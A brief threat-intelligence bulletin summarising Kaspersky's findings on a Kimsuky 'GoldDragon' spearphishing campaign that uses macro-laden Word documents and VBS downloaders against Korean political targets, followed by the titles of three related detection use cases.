Infectious Spearphishing Emails Linked with Kimsuky's GoldDragon Cluster
Industry: Government - Politicians | Level: Tactical | Source: Kaspersky
Researchers from Kaspersky have identified new cybercrime activity associated with the North Korean threat actor group, Kimsuky. A cluster of the group known as GoldDragon is specifically being tracked. Spearphishing emails distributed by the group, utilize themes associated with geopolitical issues within Korea. The email contains a weaponized Word document with a malicious macro. Once executed a VBS script is downloaded onto the victim's workstation to collect host information and download additional scripts/malware to complete the information stealing campaign. GoldDragon appears to be only interested in specific targets as an email address check validates if the infection chain should proceed with benign payloads being supplied to unexpected email addresses. The C2 infrastructure used by the group is complex containing multiple hops "The Kimsuky group configured multi-stage command and control servers with various commercial hosting services located around the world."
- Kimsuky's GoldDragon - Infection Chain with Malicious Doc
Anvilogic Use Cases:
- Suspicious Executable by CMD.exe
- MSHTA.exe execution
- Rare Remote Thread